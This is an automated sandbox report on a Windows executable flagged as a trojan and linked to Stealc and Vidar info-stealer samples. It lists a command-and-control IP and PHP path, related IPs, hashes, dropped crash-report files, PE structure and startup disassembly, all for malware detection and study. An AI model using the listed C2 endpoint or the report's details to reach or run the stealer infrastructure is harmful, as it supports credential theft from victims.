                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1528325
                                        Start date and time:2024-10-07 19:31:11 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 4m 20s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:8
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:RJQySowVRb.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:a4bb6e4d88c94f0389873b241e6eee8e.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@2/5@0/1
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 23
                                        • Number of non-executed functions: 166
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 20.189.173.20
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: RJQySowVRb.exe
                                        TimeTypeDescription
                                        13:32:19API Interceptor1x Sleep call for process: WerFault.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        62.204.41.1501f13Cs1ogc.exeGet hashmaliciousStealcBrowse
                                        • 62.204.41.150/edd20096ecef326d.php
                                        5rVhexjLCx.exeGet hashmaliciousStealcBrowse
                                        • 62.204.41.150/edd20096ecef326d.php
                                        file.exeGet hashmaliciousStealcBrowse
                                        • 62.204.41.150/edd20096ecef326d.php
                                        No context
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        TNNET-ASTNNetOyMainnetworkFI1f13Cs1ogc.exeGet hashmaliciousStealcBrowse
                                        • 62.204.41.150
                                        5rVhexjLCx.exeGet hashmaliciousStealcBrowse
                                        • 62.204.41.150
                                        file.exeGet hashmaliciousStealcBrowse
                                        • 62.204.41.150
                                        0h5IfpqflF.exeGet hashmaliciousStealcBrowse
                                        • 62.204.41.159
                                        file.exeGet hashmaliciousStealcBrowse
                                        • 62.204.41.159
                                        552RZ9fPMe.exeGet hashmaliciousStealcBrowse
                                        • 62.204.41.159
                                        vmgon5Zqja.exeGet hashmaliciousStealc, VidarBrowse
                                        • 62.204.41.159
                                        file.exeGet hashmaliciousStealcBrowse
                                        • 62.204.41.159
                                        956d73b7f041.exeGet hashmaliciousStealcBrowse
                                        • 62.204.41.159
                                        InstallSetup.exeGet hashmaliciousStealcBrowse
                                        • 62.204.41.159
                                        No context
                                        No context
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.9631593047198093
                                        Encrypted:false
                                        SSDEEP:96:5LwUFCYCqyZsyFhayX7vffQXIDcQcc6scEE6cw3ndb+HbHg/PB6HeaZFEOyKZhTV:1TyZm0SoO6ijxCZrMZtzuiFaZ24IO87
                                        MD5:2D9D250DF850BEA81012E47297D621CC
                                        SHA1:43FEE775BFA2B34E39520B122877C3AD1963F2EF
                                        SHA-256:CEED6E15B315515737D1292AA1363D939234D05E6D82764D849189EECC449464
                                        SHA-512:3496892595FBF2E8A7BA52A35ECC189AA63E76628168FE5A8A428D36D8A1F76D32A5E6070F4F4463EE9B494E7E910E3901B7982E2D73F27D05F081CE191F5BE0
                                        Malicious:true
                                        Reputation:low
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.7.9.5.9.2.3.4.3.0.6.4.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.7.9.5.9.2.3.9.7.7.5.2.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.d.a.e.4.9.a.-.b.0.5.d.-.4.a.0.e.-.a.1.d.6.-.d.9.d.c.6.3.6.8.f.f.1.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.1.7.0.d.6.8.2.-.9.6.c.6.-.4.6.b.e.-.8.4.9.d.-.d.f.b.d.5.3.1.b.b.e.1.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.J.Q.y.S.o.w.V.R.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.b.0.-.0.0.0.1.-.0.0.1.4.-.8.5.d.6.-.0.f.d.1.d.e.1.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.a.8.3.7.8.0.6.a.6.4.f.8.5.c.8.1.7.4.3.3.e.1.b.d.4.4.d.8.4.a.7.0.0.0.0.f.f.f.f.!.0.0.0.0.f.4.4.5.8.4.d.6.f.d.e.4.b.9.b.b.9.2.5.a.7.3.5.5.d.0.2.2.9.9.2.2.0.9.0.4.c.c.b.1.!.R.J.Q.y.S.o.w.V.R.b...e.x.e.....T.a.r.g.e.t.A.p.p.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Mini DuMP crash report, 14 streams, Mon Oct 7 17:32:03 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):65206
                                        Entropy (8bit):2.007782654102629
                                        Encrypted:false
                                        SSDEEP:192:dJF77XdcV7kEXiLOsOJw2kfxK8ZtChkkBtBGnDxjbHcOsuRhYa/TV7/S3eq0:rcV71sECZZwhTHfhOxrn
                                        MD5:51250C66E6F9FC35C9F1AD73FDCE256C
                                        SHA1:8F0DC563E68F6C60ED6DEB4D1178375E219AF0C5
                                        SHA-256:1354604565D131C73F73F3A2D30F6AF9C7D947092CF93E239C4B1F7432304942
                                        SHA-512:6BC246D092313D08E91EF53CF9E77FF787566F37D7CD7FFBEFCC164413498623639C59D654964EF905888ECF44B7AF3C8B7010645B3F49E72D3ADCA29F9B85A4
                                        Malicious:false
                                        Reputation:low
                                        Preview:MDMP..a..... ..........g............4...............<............*..........T.......8...........T...........P3..f.......................................................................................................eJ......H.......GenuineIntel............T..............g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8336
                                        Entropy (8bit):3.6970718248316654
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJiH6Znd6YEI1SUiG+J1QgmfKurpD089bcosfW0m:R6lXJS6Znd6YEaSUiGu1QgmfKucbfs
                                        MD5:FB000183F0F999E9F4EA8431AE78CD25
                                        SHA1:FC801E446C9B3CBFF6D4D36D165DBE03AD6D1683
                                        SHA-256:6B973DCD487B6BDBF98C3D23BAB3585228B887485D0E51CF3564E95C7BB4CF93
                                        SHA-512:4A094E2D61F34588665FF0045E0D32401B8167D2AADDE9BB3A03C97ED2EA804B4ED9FF5EC6D99D28EE22D65DCE876F3DAEF8B90911AB11D9ECE0E4A5DAB37563
                                        Malicious:false
                                        Reputation:low
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.9.6.8.<./.P.i.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4579
                                        Entropy (8bit):4.485577701192871
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zs5Jg77aI9OdyOWpW8VYiYm8M4Jn5FuN+q8cUJ8xwd:uIjfLI78dyv7VOJKCexwd
                                        MD5:0F1B9A260CA07BEC93AD467CB51F7995
                                        SHA1:98FDE83904A2C69D5929D41831BE790C7977826C
                                        SHA-256:4448A12BECE90E949A09C067CA1F518375A393E656BC76F1164D0038BB8CBEF0
                                        SHA-512:6E78054C6F8F0A7E8D35CECBAE27AF29120DF50E939B2573F79020231DDD80BDCFE3E5BDE2D89DC8A6925B2366EB8674E88BE917333F7D2271544B960EF74086
                                        Malicious:false
                                        Reputation:low
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533314" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:MS Windows registry file, NT/2000 or above
                                        Category:dropped
                                        Size (bytes):1835008
                                        Entropy (8bit):4.421599862106815
                                        Encrypted:false
                                        SSDEEP:6144:5Svfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNM0uhiTwj:wvloTMW+EZMM6DFya03wj
                                        MD5:272E4EEE6B1C24B385B1696C8F78BA0F
                                        SHA1:979C0550EC528BE9B2A44B5C3847499442FF5B00
                                        SHA-256:227285E72EA53AB0499F28EAB3B47DF86131EE0C1E048E00C55F6C7548D6C141
                                        SHA-512:38C25F78A0BC3C0D6F891CDF7E098A7ABEDC4F68B0533499F3BA66F1E6495D6A7D9195C694E9EDB05AFD09E39F1D6F9B67B0FAD05D0508DA7A0764196EAA8D76
                                        Malicious:false
                                        Reputation:low
                                        Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):6.346303886858742
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:RJQySowVRb.exe
                                        File size:454'144 bytes
                                        MD5:a4bb6e4d88c94f0389873b241e6eee8e
                                        SHA1:f44584d6fde4b9bb925a7355d02299220904ccb1
                                        SHA256:9086348efcc7f6bb5fd00b9919c6fecaa04a9c58aeabaaaac80a1913e9a1e3b4
                                        SHA512:13383cdca12687b88940980a6140d734db4674bbab24c3f328bc2adb4079b81becc40400151ec36f21e960dc270a04378b3d8832c902fd0fe93b849c22ecd3a5
                                        SSDEEP:12288:+kpagGiK0F+wkHt9nMY/4zYZKLO5MoDLs:+A73F+HJQzOKLMs
                                        TLSH:CCA4BF12A6E0BC60F5124AB58D2AD7EC352DFC519D186B5F23187F2F19722E2D6337A0
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........;..B;..B;..BT.bB#..BT.WB...BT.VBW..B2.oB<..B;..B...BT.SB:..BT.fB:..BT.aB:..BRich;..B........................PE..L......e...
                                        Icon Hash:41014d45494d610d
                                        Entrypoint:0x403bb9
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                        Time Stamp:0x65EF1EA7 [Mon Mar 11 15:09:27 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:e40ec87d26b2fdb6278430b22f5c1df6
                                        Instruction
                                        call 00007F59C8B9E8C9h
                                        jmp 00007F59C8B9B81Eh
                                        push dword ptr [00451258h]
                                        call dword ptr [0040F10Ch]
                                        test eax, eax
                                        je 00007F59C8B9B994h
                                        call eax
                                        push 00000019h
                                        call 00007F59C8B9E1ABh
                                        push 00000001h
                                        push 00000000h
                                        call 00007F59C8B9B150h
                                        add esp, 0Ch
                                        jmp 00007F59C8B9B115h
                                        mov edi, edi
                                        push ebp
                                        mov ebp, esp
                                        sub esp, 20h
                                        mov eax, dword ptr [ebp+08h]
                                        push esi
                                        push edi
                                        push 00000008h
                                        pop ecx
                                        mov esi, 0040F3B0h
                                        lea edi, dword ptr [ebp-20h]
                                        rep movsd
                                        mov dword ptr [ebp-08h], eax
                                        mov eax, dword ptr [ebp+0Ch]
                                        pop edi
                                        mov dword ptr [ebp-04h], eax
                                        pop esi
                                        test eax, eax
                                        je 00007F59C8B9B99Eh
                                        test byte ptr [eax], 00000008h
                                        je 00007F59C8B9B999h
                                        mov dword ptr [ebp-0Ch], 01994000h
                                        lea eax, dword ptr [ebp-0Ch]
                                        push eax
                                        push dword ptr [ebp-10h]
                                        push dword ptr [ebp-1Ch]
                                        push dword ptr [ebp-20h]
                                        call dword ptr [0040F140h]
                                        leave
                                        retn 0008h
                                        mov edi, edi
                                        push ebp
                                        mov ebp, esp
                                        push ecx
                                        push ebx
                                        mov eax, dword ptr [ebp+0Ch]
                                        add eax, 0Ch
                                        mov dword ptr [ebp-04h], eax
                                        mov ebx, dword ptr fs:[00000000h]
                                        mov eax, dword ptr [ebx]
                                        mov dword ptr fs:[00000000h], eax
                                        mov eax, dword ptr [ebp+08h]
                                        mov ebx, dword ptr [ebp+0Ch]
                                        mov ebp, dword ptr [ebp-04h]
                                        mov esp, dword ptr [ebx-04h]
                                        jmp eax
                                        pop ebx
                                        leave
                                        retn 0008h
                                        pop eax
                                        pop ecx
                                        xchg dword ptr [esp], eax
                                        jmp eax
                                        pop eax
                                        pop ecx
                                        xchg dword ptr [esp], eax
                                        jmp eax
                                        pop eax
                                        pop ecx
                                        xchg dword ptr [esp], eax
                                        jmp eax
                                        Programming Language:
                                        • [ASM] VS2010 build 30319
                                        • [C++] VS2010 build 30319
                                        • [ C ] VS2010 build 30319
                                        • [IMP] VS2008 SP1 build 30729
                                        • [RES] VS2010 build 30319
                                        • [LNK] VS2010 build 30319
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x49af00x50.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x1f248.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x49b400x1c.rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x490700x40.rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0xf0000x1e0.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000xd49d0xd60038db7317d16bc3efbe7628eb4602f870False0.6014164719626168data6.6669719810878645IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0xf0000x3b5c80x3b6008e0b3e377963df6f047a456dd26d29f8False0.7528947368421053data6.875929241481956IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0x4b0000x11cc00x6000bccf2866a5594886fc8d7b98db7e9669False0.08406575520833333data1.091471513460086IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .bak0x5d0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .nuna0x5e0000xd60x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .roxis0x5f0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x600000x2002480x1f4004c727b04121aa141311eae380585af34unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_CURSOR0x79b780x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                        RT_CURSOR0x79ea80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                        RT_CURSOR0x7a0000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                        RT_CURSOR0x7aea80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                        RT_CURSOR0x7b7500x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                        RT_CURSOR0x7bce80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                        RT_CURSOR0x7cb900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                        RT_CURSOR0x7d4380x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                        RT_ICON0x60ac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3718017057569296
                                        RT_ICON0x60ac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3718017057569296
                                        RT_ICON0x619680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.45893501805054154
                                        RT_ICON0x619680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.45893501805054154
                                        RT_ICON0x622100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.45794930875576034
                                        RT_ICON0x622100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.45794930875576034
                                        RT_ICON0x628d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.45809248554913296
                                        RT_ICON0x628d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.45809248554913296
                                        RT_ICON0x62e400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2704356846473029
                                        RT_ICON0x62e400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2704356846473029
                                        RT_ICON0x653e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.30558161350844276
                                        RT_ICON0x653e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.30558161350844276
                                        RT_ICON0x664900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3608156028368794
                                        RT_ICON0x664900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3608156028368794
                                        RT_ICON0x669600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.5631663113006397
                                        RT_ICON0x669600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.5631663113006397
                                        RT_ICON0x678080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.546028880866426
                                        RT_ICON0x678080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.546028880866426
                                        RT_ICON0x680b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.619942196531792
                                        RT_ICON0x680b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.619942196531792
                                        RT_ICON0x686180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.46078838174273856
                                        RT_ICON0x686180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.46078838174273856
                                        RT_ICON0x6abc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.48850844277673544
                                        RT_ICON0x6abc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.48850844277673544
                                        RT_ICON0x6bc680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.49508196721311476
                                        RT_ICON0x6bc680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.49508196721311476
                                        RT_ICON0x6c5f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.449468085106383
                                        RT_ICON0x6c5f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.449468085106383
                                        RT_ICON0x6cac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.376865671641791
                                        RT_ICON0x6cac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.376865671641791
                                        RT_ICON0x6d9680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.506768953068592
                                        RT_ICON0x6d9680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.506768953068592
                                        RT_ICON0x6e2100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5702764976958525
                                        RT_ICON0x6e2100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5702764976958525
                                        RT_ICON0x6e8d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.5816473988439307
                                        RT_ICON0x6e8d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.5816473988439307
                                        RT_ICON0x6ee400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.37053941908713695
                                        RT_ICON0x6ee400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.37053941908713695
                                        RT_ICON0x713e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.4129924953095685
                                        RT_ICON0x713e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.4129924953095685
                                        RT_ICON0x724900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.4012295081967213
                                        RT_ICON0x724900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.4012295081967213
                                        RT_ICON0x72e180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.4716312056737589
                                        RT_ICON0x72e180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.4716312056737589
                                        RT_ICON0x732f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.3773987206823028
                                        RT_ICON0x732f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.3773987206823028
                                        RT_ICON0x741a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5248194945848376
                                        RT_ICON0x741a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5248194945848376
                                        RT_ICON0x74a480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.6042626728110599
                                        RT_ICON0x74a480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.6042626728110599
                                        RT_ICON0x751100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6596820809248555
                                        RT_ICON0x751100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6596820809248555
                                        RT_ICON0x756780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.4900414937759336
                                        RT_ICON0x756780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.4900414937759336
                                        RT_ICON0x77c200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.5082082551594747
                                        RT_ICON0x77c200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.5082082551594747
                                        RT_ICON0x78cc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.48811475409836064
                                        RT_ICON0x78cc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.48811475409836064
                                        RT_ICON0x796500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.5407801418439716
                                        RT_ICON0x796500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.5407801418439716
                                        RT_DIALOG0x7dc280x58data0.8977272727272727
                                        RT_STRING0x7dc800x370dataTamilIndia0.4681818181818182
                                        RT_STRING0x7dc800x370dataTamilSri Lanka0.4681818181818182
                                        RT_STRING0x7dff00x6c0dataTamilIndia0.43344907407407407
                                        RT_STRING0x7dff00x6c0dataTamilSri Lanka0.43344907407407407
                                        RT_STRING0x7e6b00x37cdataTamilIndia0.45067264573991034
                                        RT_STRING0x7e6b00x37cdataTamilSri Lanka0.45067264573991034
                                        RT_STRING0x7ea300x594dataTamilIndia0.4362745098039216
                                        RT_STRING0x7ea300x594dataTamilSri Lanka0.4362745098039216
                                        RT_STRING0x7efc80x27edataTamilIndia0.49059561128526646
                                        RT_STRING0x7efc80x27edataTamilSri Lanka0.49059561128526646
                                        RT_ACCELERATOR0x79b300x48dataTamilIndia0.8472222222222222
                                        RT_ACCELERATOR0x79b300x48dataTamilSri Lanka0.8472222222222222
                                        RT_GROUP_CURSOR0x79fd80x22data1.0294117647058822
                                        RT_GROUP_CURSOR0x7bcb80x30data0.9375
